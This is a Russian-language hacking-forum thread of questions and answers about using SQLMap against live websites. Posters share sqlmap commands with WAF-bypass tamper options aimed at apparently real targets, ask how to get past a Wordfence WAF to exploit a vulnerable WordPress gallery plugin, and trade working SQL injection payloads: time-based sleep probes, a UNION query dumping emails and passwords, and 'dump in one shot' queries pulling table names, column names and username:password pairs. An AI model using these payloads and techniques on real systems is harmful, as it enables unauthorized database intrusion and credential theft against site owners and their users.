Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Люди добрые ,подскажите ввожу
    sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --risk=3 --level=1 --threads=10 --dbs
    получаю, имя бд
    available databases [1]:
    [*] bd_upgrade_live
    далее ввожу
    sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --threads=10 -D suplemen_upgrade_live -tables

    таблица не выводит,пишет
    [08:12:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=xol' AND 3094=3094 AND 'NPlU'='NPlU
    ---
    [08:12:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
    [08:12:55] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL 5
    [08:12:55] [INFO] fetching tables for database: 'suplemen_upgrade_live'
    [08:12:55] [INFO] fetching number of tables for database 'suplemen_upgrade_live'
    [08:13:01] [INFO] retrieved:
    [08:13:02] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases

    [08:13:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [08:13:03] [WARNING] unable to retrieve the number of tables for database 'bd_upgrade_live'
    [08:13:03] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] n
    No tables found
    [08:14:27] [WARNING] HTTP error codes detected during run:
    403 (Forbidden) - 3 times
    [08:14:27] [INFO] fetched data logged to text files under '/home/win/.sqlmap/output/www.domen.mx'

    [*] ending @ 08:14:27 /2020-02-06/


    Обьясните пожалуйста почему так?
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    805
    Reputations:
    841
    Ну все логично, срабатывает какойто ваф, пробуйте крутить руками и смотреть на что срабатывает, и далее подбирайте/пишите нужный тампер
     
    _________________________
  3. Andrey979

    Andrey979 New Member

    Joined:
    20 Sep 2019
    Messages:
    51
    Likes Received:
    4
    Reputations:
    0
    Скажите пожалуйста. Как правильно в GET запросе задать параметр мапу? Я задаю -p "параметр" а он по своему идёт
     
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    не может быть. Попробуйте поставить *
     
  5. Andrey979

    Andrey979 New Member

    Joined:
    20 Sep 2019
    Messages:
    51
    Likes Received:
    4
    Reputations:
    0
    Ребят. Каким темпером можно обойти WAF Wordfence. Cайт как поняли на WordPress. Нашел уязвимый плагин. Под страницу входа в POST запросе есть скуля. Есть експлойт готовый http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock)
    Но в браузере пишет
    403 Forbidden
    A potentially unsafe operation has been detected in your request to this site
    Как обойти этот WAF мапом?

    Пробую verbose -v3. 403 ошибка везде. Как этот експлойт мапу скормить?
     
    #1005 Andrey979, 7 Feb 2020
    Last edited: 7 Feb 2020
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Ты спрашиваешь про одно, а в лугах (то что ты кинул) совсем другое. По поводу тамперов трудно сказать, надо руками тестить. Лучше руками крутить.
     
  7. Andrey979

    Andrey979 New Member

    Joined:
    20 Sep 2019
    Messages:
    51
    Likes Received:
    4
    Reputations:
    0
    У меня знаний в SQL нет, чтобы руками крутить. С мапом немного проще. Но также не знаю как с ним работать полностью. Ман бы на русском толковый как руками крутить
     
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    В хроме переводчик есть а ещё есть поиск по форуму
     
    Andrey979 likes this.
  9. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    52
    Likes Received:
    5
    Reputations:
    0
    может кто то помочь , привести в виду DIOSa ?


    5 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71626a6a71,IFNULL(CAST(email AS NCHAR),0x20),0x687971737978,IFNULL(CAST(password AS NCHAR),0x20),0x716b716b71) FROM base.users LIMIT 3,
    ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
    NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uBIi

    хотя тут юнион , но при этом выводит 1 запись оч долго
     
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    может кто то помочь , привести в виду DIOSa ? - Это как?
     
  11. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    52
    Likes Received:
    5
    Reputations:
    0
    как то так

    https://defcon.ru/web-security/2320/

    что бы он не по одной записи "выплевывал"
     
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Ну, загугли dios mssql.
    п.с может лимит убрать?
     
  13. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    52
    Likes Received:
    5
    Reputations:
    0
    это mysql
    п.с зачем убирать лимит , если https://rdot.org/forum/showthread.php?t=124&page=2

    SELECT @p FROM (SELECT @p:=null,(SELECT COUNT(*) FROM (SELECT * FROM {TABLE_NAME} LIMIT {S},{N})r WHERE (@p:=concat_ws(0x2c,@p,{COLUMN_NAME}))>0))o
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    И как это к sqlmap относиться ?
     
  15. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    303
    Likes Received:
    143
    Reputations:
    2
    Code:
    (select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)  - таблицы
    (select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name={NAME_TABLE_HEX}) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x) - колонки
    (select (@x) from (select (@x:=0x00),(select (0) from ({TABLE_NAME})where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password))))x) - данные
    
    И да не в той теме пост
     
    #1015 karkajoi, 10 Feb 2020
    Last edited: 10 Feb 2020
    Xsite likes this.
  16. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    303
    Likes Received:
    143
    Reputations:
    2
    Можно ли мапой посмотреть размер БД,таблиц,колонок ?
     
    #1016 karkajoi, 15 Feb 2020
    Last edited: 15 Feb 2020
  17. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    --count
     
  18. yuriy_ivanov

    yuriy_ivanov New Member

    Joined:
    27 Sep 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    та сразу юзай -D ... --columns --count
     
  19. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    303
    Likes Received:
    143
    Reputations:
    2
    Имелось в виду не количество записей в той или оной таблице , а их вес в B,МB
     
  20. NineCent

    NineCent New Member

    Joined:
    4 Nov 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Кто сможет помочь, Акунет нашел скулю слепую.
    • 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.333
    • 0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z => 9.471
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.449
    • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.776
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.608
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.581
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.463
    • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.504
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.7
    Начинаю крутить Sql map пишу следующее

    тут файл с куками и прочим -p "service" --dbs --threads 10 --time-sec 10 --risk=3 --level=5

    Он мне пишет что параметр уязвим.

    [16:58:49] [INFO] POST parameter 'service' appears to be 'HSQLDB >= 2.0 stacked queries (heavy query)' injectable
    it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
    Но потом ничего не находит

    каждый раз когда запускаю снова, выдает результат но уже другой вариант уязвимой версии =\
    Что можно попробовать подскажите пожалуйста.
     
Loading...